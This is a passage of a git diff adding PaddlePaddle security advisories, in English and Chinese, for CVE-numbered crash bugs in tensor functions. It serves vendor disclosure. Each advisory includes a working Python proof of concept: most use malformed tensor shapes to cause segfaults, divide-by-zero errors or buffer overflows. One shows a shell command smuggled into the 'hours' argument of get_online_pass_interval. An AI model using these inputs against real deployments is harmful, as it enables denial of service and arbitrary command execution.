+++ b/security/advisory/pdsa-2023-007_cn.md
@@ -0,0 +1,31 @@
+## PDSA-2023-007: FPE in paddle.linalg.matrix_rank
+
+### CVE编号
+
+CVE-2023-38675
+
+### 影响
+
+当由`x`的dim计算的`rows`或者`cols`为0时，`paddle.linalg.matrix_rank`会由`numel / (rows * cols)`触发除0异常，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+x = np.random.uniform(0,0,[0,0,0,0,0]).astype(np.float32)
+x = paddle.to_tensor(x)
+paddle.linalg.matrix_rank(x)
+```
+
+### 补丁
+
+我们在commit [9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1](https://github.com/PaddlePaddle/Paddle/pull/55644/commits/9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of ShanghaiTech University 提交。
diff --git a/security/advisory/pdsa-2023-008.md b/security/advisory/pdsa-2023-008.md
new file mode 100644
index 00000000000000..8994abd90fc23e
--- /dev/null
+++ b/security/advisory/pdsa-2023-008.md
@@ -0,0 +1,31 @@
+## PDSA-2023-008: Segfault in paddle.dot
+
+### CVE Number
+
+CVE-2023-38676
+
+### Impact
+
+Segfault occurs when `x` and `y` shape is 0 in `paddle.dot`. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0]).astype(np.float32))
+y = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0]).astype(np.float32))
+paddle.dot(x, y)
+```
+
+### Patches
+
+We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-008_cn.md b/security/advisory/pdsa-2023-008_cn.md
new file mode 100644
index 00000000000000..92052de2f38090
--- /dev/null
+++ b/security/advisory/pdsa-2023-008_cn.md
@@ -0,0 +1,31 @@
+## PDSA-2023-008: Segfault in paddle.dot
+
+### CVE编号
+
+CVE-2023-38676
+
+### 影响
+
+在`paddle.dot`中当`x`和`y`的shape为0时，将造成segfault，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0]).astype(np.float32))
+y = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0]).astype(np.float32))
+paddle.dot(x, y)
+```
+
+### 补丁
+
+我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-009.md b/security/advisory/pdsa-2023-009.md
new file mode 100644
index 00000000000000..2f0450f9eb4e32
--- /dev/null
+++ b/security/advisory/pdsa-2023-009.md
@@ -0,0 +1,31 @@
+## PDSA-2023-009: FPE in paddle.linalg.eig
+
+### CVE Number
+
+CVE-2023-38677
+
+### Impact
+
+When tensor dims contain 0, `paddle.linalg.eig` will trigger a float point exception. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [3, 6, 0, 2, 2]).astype(np.float32))
+
+paddle.linalg.eig(x)
+```
+
+### Patches
+
+We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-009_cn.md b/security/advisory/pdsa-2023-009_cn.md
new file mode 100644
index 00000000000000..a212a2320c8902
--- /dev/null
+++ b/security/advisory/pdsa-2023-009_cn.md
@@ -0,0 +1,31 @@
+## PDSA-2023-009: FPE in paddle.linalg.eig
+
+### CVE编号
+
+CVE-2023-38677
+
+### 影响
+
+当张量包含维度值为0的情况，`paddle.linalg.eig`会触发除0异常，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [3, 6, 0, 2, 2]).astype(np.float32))
+
+paddle.linalg.eig(x)
+```
+
+### 补丁
+
+我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-010.md b/security/advisory/pdsa-2023-010.md
new file mode 100644
index 00000000000000..3f1c65f6c91c4f
--- /dev/null
+++ b/security/advisory/pdsa-2023-010.md
@@ -0,0 +1,33 @@
+## PDSA-2023-010: Segfault in paddle.mode
+
+### CVE Number
+
+CVE-2023-38678
+
+### Impact
+
+Invalid `axis` and `dim_size` may cause `paddle.mode` segfault . The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+paddle.mode(
+    x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64)),
+    axis=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)),
+    keepdim=True
+)
+```
+
+### Patches
+
+We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-010_cn.md b/security/advisory/pdsa-2023-010_cn.md
new file mode 100644
index 00000000000000..f72cd8af856360
--- /dev/null
+++ b/security/advisory/pdsa-2023-010_cn.md
@@ -0,0 +1,33 @@
+## PDSA-2023-010: Segfault in paddle.mode
+
+### CVE编号
+
+CVE-2023-38678
+
+### 影响
+
+接收异常的`axis`和`dim_size`可能会造成`paddle.mode`发生segfault，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+paddle.mode(
+    x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64)),
+    axis=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)),
+    keepdim=True
+)
+```
+
+### 补丁
+
+我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-011.md b/security/advisory/pdsa-2023-011.md
new file mode 100644
index 00000000000000..da7985dede7d00
--- /dev/null
+++ b/security/advisory/pdsa-2023-011.md
@@ -0,0 +1,32 @@
+## PDSA-2023-011: Null pointer dereference in paddle.nextafter
+
+### CVE Number
+
+CVE-2023-52302
+
+### Impact
+
+Null pointer dereference in `paddle.nextafter` when tensor dims are invalid . The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+paddle.nextafter(
+    x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [1, 2]).astype(np.float32)),
+    y=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0, 0, 0, 0]).astype(np.float32))
+)
+```
+
+### Patches
+
+We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-011_cn.md b/security/advisory/pdsa-2023-011_cn.md
new file mode 100644
index 00000000000000..71440ac2c5d9a2
--- /dev/null
+++ b/security/advisory/pdsa-2023-011_cn.md
@@ -0,0 +1,32 @@
+## PDSA-2023-011: Null pointer dereference in paddle.nextafter
+
+### CVE编号
+
+CVE-2023-52302
+
+### 影响
+
+输入张量的维度异常时，`paddle.nextafter`会引发空指针解引用，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+paddle.nextafter(
+    x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [1, 2]).astype(np.float32)),
+    y=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0, 0, 0, 0]).astype(np.float32))
+)
+```
+
+### 补丁
+
+我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-012.md b/security/advisory/pdsa-2023-012.md
new file mode 100644
index 00000000000000..f659d356154474
--- /dev/null
+++ b/security/advisory/pdsa-2023-012.md
@@ -0,0 +1,35 @@
+## PDSA-2023-012: Segfault in paddle.put_along_axis
+
+### CVE Number
+
+CVE-2023-52303
+
+### Impact
+
+Segfault in `paddle.put_along_axis` when tensor dims are invalid . The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+paddle.put_along_axis(
+    arr=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [1]).astype(np.int32)),
+    indices=paddle.to_tensor(np.random.uniform(-9223372036854775808, 9223372036854775807, [1]).astype(np.int64)),
+    values=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)),
+    axis=0,
+    reduce="assign"
+)
+```
+
+### Patches
+
+We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-012_cn.md b/security/advisory/pdsa-2023-012_cn.md
new file mode 100644
index 00000000000000..234961cded2359
--- /dev/null
+++ b/security/advisory/pdsa-2023-012_cn.md
@@ -0,0 +1,35 @@
+## PDSA-2023-012: Segfault in paddle.put_along_axis
+
+### CVE编号
+
+CVE-2023-52303
+
+### 影响
+
+输入张量的维度异常时，`paddle.put_along_axis`会引发segfault，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+paddle.put_along_axis(
+    arr=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [1]).astype(np.int32)),
+    indices=paddle.to_tensor(np.random.uniform(-9223372036854775808, 9223372036854775807, [1]).astype(np.int64)),
+    values=paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32)),
+    axis=0,
+    reduce="assign"
+)
+```
+
+### 补丁
+
+我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-013.md b/security/advisory/pdsa-2023-013.md
new file mode 100644
index 00000000000000..53deab6f3c346a
--- /dev/null
+++ b/security/advisory/pdsa-2023-013.md
@@ -0,0 +1,32 @@
+## PDSA-2023-013: Stack overflow in paddle.searchsorted
+
+### CVE Number
+
+CVE-2023-52304
+
+### Impact
+
+Invalid shapes cuase stack buffer overflow in `paddle.searchsorted`. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+sorted_sequence = paddle.to_tensor(np.array(0))
+values = paddle.to_tensor(np.random.uniform(-10, 10, []).astype(np.float64))
+
+paddle.searchsorted(sorted_sequence, values, out_int32=True, right=True)
+```
+
+### Patches
+
+We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-013_cn.md b/security/advisory/pdsa-2023-013_cn.md
new file mode 100644
index 00000000000000..c5210242f651fd
--- /dev/null
+++ b/security/advisory/pdsa-2023-013_cn.md
@@ -0,0 +1,32 @@
+## PDSA-2023-013: Stack overflow in paddle.searchsorted
+
+### CVE编号
+
+CVE-2023-52304
+
+### 影响
+
+不正确的shapes会引发`paddle.searchsorted`栈溢出，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+sorted_sequence = paddle.to_tensor(np.array(0))
+values = paddle.to_tensor(np.random.uniform(-10, 10, []).astype(np.float64))
+
+paddle.searchsorted(sorted_sequence, values, out_int32=True, right=True)
+```
+
+### 补丁
+
+我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-014.md b/security/advisory/pdsa-2023-014.md
new file mode 100644
index 00000000000000..1792f3b21e8fac
--- /dev/null
+++ b/security/advisory/pdsa-2023-014.md
@@ -0,0 +1,32 @@
+## PDSA-2023-014: FPE in paddle.topk
+
+### CVE Number
+
+CVE-2023-52305
+
+### Impact
+
+FPE in `paddle.topk` when `x` and `k` dims not correct. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [6, 2, 1, 4, 2, 0]).astype(np.float64))
+k = paddle.to_tensor(np.array(1).astype(np.int32))
+
+paddle.topk(x, k, axis=2,largest=False, sorted=True)
+```
+
+### Patches
+
+We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-014_cn.md b/security/advisory/pdsa-2023-014_cn.md
new file mode 100644
index 00000000000000..d1be63be148d21
--- /dev/null
+++ b/security/advisory/pdsa-2023-014_cn.md
@@ -0,0 +1,32 @@
+## PDSA-2023-014: FPE in paddle.topk
+
+### CVE编号
+
+CVE-2023-52305
+
+### 影响
+
+当`x`和`k`的dims不符合要求时，可能导致`paddle.topk`除0异常，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [6, 2, 1, 4, 2, 0]).astype(np.float64))
+k = paddle.to_tensor(np.array(1).astype(np.int32))
+
+paddle.topk(x, k, axis=2,largest=False, sorted=True)
+```
+
+### 补丁
+
+我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-015.md b/security/advisory/pdsa-2023-015.md
new file mode 100644
index 00000000000000..6830516e0505b6
--- /dev/null
+++ b/security/advisory/pdsa-2023-015.md
@@ -0,0 +1,33 @@
+## PDSA-2023-015: FPE in paddle.lerp
+
+### CVE Number
+
+CVE-2023-52306
+
+### Impact
+
+FPE in `paddle.lerp` when tensor shape is invalid. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64))
+y = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [4, 0, 0, 2, 6]).astype(np.float64))
+weight = paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64))
+
+paddle.lerp(x, y, weight)
+```
+
+### Patches
+
+We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-015_cn.md b/security/advisory/pdsa-2023-015_cn.md
new file mode 100644
index 00000000000000..7daa17bfff490b
--- /dev/null
+++ b/security/advisory/pdsa-2023-015_cn.md
@@ -0,0 +1,33 @@
+## PDSA-2023-015: FPE in paddle.lerp
+
+### CVE编号
+
+CVE-2023-52306
+
+### 影响
+
+不合法的张量shape可能导致`paddle.lerp`除0异常，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64))
+y = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [4, 0, 0, 2, 6]).astype(np.float64))
+weight = paddle.to_tensor(np.random.uniform(-6666666, 100000000, []).astype(np.float64))
+
+paddle.lerp(x, y, weight)
+```
+
+### 补丁
+
+我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-016.md b/security/advisory/pdsa-2023-016.md
new file mode 100644
index 00000000000000..2c6e93e3f87717
--- /dev/null
+++ b/security/advisory/pdsa-2023-016.md
@@ -0,0 +1,32 @@
+## PDSA-2023-016: Stack overflow in paddle.linalg.lu_unpack
+
+### CVE Number
+
+CVE-2023-52307
+
+### Impact
+
+Invalid shapes cuase stack buffer overflow in `paddle.linalg.lu_unpack`.  The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [1, 6, 4, 8, 2]).astype(np.float32))
+y = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32))
+
+paddle.linalg.lu_unpack(x, y, True, True)
+```
+
+### Patches
+
+We have patched the issue in commit [10093636a10f29f73f13729b33570d8cafd58fb6](https://github.com/PaddlePaddle/Paddle/pull/56311/commits/10093636a10f29f73f13729b33570d8cafd58fb6).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-016_cn.md b/security/advisory/pdsa-2023-016_cn.md
new file mode 100644
index 00000000000000..cdad03e02dce4a
--- /dev/null
+++ b/security/advisory/pdsa-2023-016_cn.md
@@ -0,0 +1,32 @@
+## PDSA-2023-016: Stack overflow in paddle.linalg.lu_unpack
+
+### CVE编号
+
+CVE-2023-52307
+
+### 影响
+
+不正确的shapes会引发`paddle.linalg.lu_unpack`栈溢出，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [1, 6, 4, 8, 2]).astype(np.float32))
+y = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32))
+
+paddle.linalg.lu_unpack(x, y, True, True)
+```
+
+### 补丁
+
+我们在commit [10093636a10f29f73f13729b33570d8cafd58fb6](https://github.com/PaddlePaddle/Paddle/pull/56311/commits/10093636a10f29f73f13729b33570d8cafd58fb6)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-017.md b/security/advisory/pdsa-2023-017.md
new file mode 100644
index 00000000000000..2d65947f7be858
--- /dev/null
+++ b/security/advisory/pdsa-2023-017.md
@@ -0,0 +1,33 @@
+## PDSA-2023-017: FPE in paddle.amin
+
+### CVE Number
+
+CVE-2023-52308
+
+### Impact
+
+FPE in `paddle.amin` when `x` has invalid dims. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+paddle.amin(
+    x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0, 6, 3]).astype(np.float32)),
+    axis=-1,
+    keepdim=True
+)
+```
+
+### Patches
+
+We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-017_cn.md b/security/advisory/pdsa-2023-017_cn.md
new file mode 100644
index 00000000000000..ac04896e1ffeb4
--- /dev/null
+++ b/security/advisory/pdsa-2023-017_cn.md
@@ -0,0 +1,33 @@
+## PDSA-2023-017: FPE in paddle.amin
+
+### CVE编号
+
+CVE-2023-52308
+
+### 影响
+
+当`x` dims不符合要求时，可能导致`paddle.amin`除0异常，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+paddle.amin(
+    x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0, 6, 3]).astype(np.float32)),
+    axis=-1,
+    keepdim=True
+)
+```
+
+### 补丁
+
+我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-018.md b/security/advisory/pdsa-2023-018.md
new file mode 100644
index 00000000000000..6dbec29738b2f8
--- /dev/null
+++ b/security/advisory/pdsa-2023-018.md
@@ -0,0 +1,32 @@
+## PDSA-2023-018: Heap buffer overflow in paddle.repeat_interleave
+
+### CVE Number
+
+CVE-2023-52309
+
+### Impact
+
+Heap buffer overflow in `paddle.repeat_interleave` by using invalid params. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [4, 4, 8, 3, 2, 4]).astype(np.float64))
+repeats = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [2, 1]).astype(np.int32))
+
+paddle.repeat_interleave(x, repeats, axis=-2)
+```
+
+### Patches
+
+We have patched the issue in commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of CAS-IIE.
diff --git a/security/advisory/pdsa-2023-018_cn.md b/security/advisory/pdsa-2023-018_cn.md
new file mode 100644
index 00000000000000..9680099b47d83c
--- /dev/null
+++ b/security/advisory/pdsa-2023-018_cn.md
@@ -0,0 +1,32 @@
+## PDSA-2023-018: Heap buffer overflow in paddle.repeat_interleave
+
+### CVE编号
+
+CVE-2023-52309
+
+### 影响
+
+非法的参数可能导致`paddle.repeat_interleave`堆溢出，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [4, 4, 8, 3, 2, 4]).astype(np.float64))
+repeats = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [2, 1]).astype(np.int32))
+
+paddle.repeat_interleave(x, repeats, axis=-2)
+```
+
+### 补丁
+
+我们在commit [19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc](https://github.com/PaddlePaddle/Paddle/commit/19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of CAS-IIE 提交。
diff --git a/security/advisory/pdsa-2023-019.md b/security/advisory/pdsa-2023-019.md
new file mode 100644
index 00000000000000..78a7b6b3230f5a
--- /dev/null
+++ b/security/advisory/pdsa-2023-019.md
@@ -0,0 +1,35 @@
+## PDSA-2023-019: Command injection in get_online_pass_interval
+
+### CVE Number
+
+CVE-2023-52310
+
+### Impact
+
+Command injection in `get_online_pass_interval` which could lead to execute arbitrary commands. The PoC is as follows:
+
+```python
+from paddle.incubate.distributed.fleet.fleet_util import FleetUtil
+
+fleet_util = FleetUtil()
+online_pass_interval = fleet_util.get_online_pass_interval(
+    days="{20190720..20190729}",
+    hours="9;touch /home/test/aaaa",
+    split_interval=5,
+    split_per_pass=2,
+    is_data_hourly_placed=False
+)
+```
+
+### Patches
+
+We have patched the issue in commits [1aae481dfd7d2055c801563e254f1484b974b68e](https://github.com/PaddlePaddle/Paddle/pull/60023/commits/1aae481dfd7d2055c801563e254f1484b974b68e), [c62d87eb91c84154af40946f17205d86f608866b](https://github.com/PaddlePaddle/Paddle/pull/60544/commits/c62d87eb91c84154af40946f17205d86f608866b) and [f8560c903c80450e37b8f304a9cd8207678f2f83](https://github.com/PaddlePaddle/Paddle/pull/60615/commits/f8560c903c80450e37b8f304a9cd8207678f2f83).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by huntr.com and leeya_bug.
diff --git a/security/advisory/pdsa-2023-019_cn.md b/security/advisory/pdsa-2023-019_cn.md
new file mode 100644
index 00000000000000..096d4c191ebc2b
--- /dev/null
+++ b/security/advisory/pdsa-2023-019_cn.md
@@ -0,0 +1,35 @@
+## PDSA-2023-019: Command injection in get_online_pass_interval
+
+### CVE编号
+
+CVE-2023-52310
+
+### 影响
+
+`get_online_pass_interval`存在命令注入漏洞，可造成任意命令执行，PoC代码如下：
+
+```python
+from paddle.incubate.distributed.fleet.fleet_util import FleetUtil
+
+fleet_util = FleetUtil()
+online_pass_interval = fleet_util.get_online_pass_interval(
+    days="{20190720..20190729}",
+    hours="9;touch /home/test/aaaa",
+    split_interval=5,
+    split_per_pass=2,
+    is_data_hourly_placed=False
+)
+```
+
+### 补丁
+
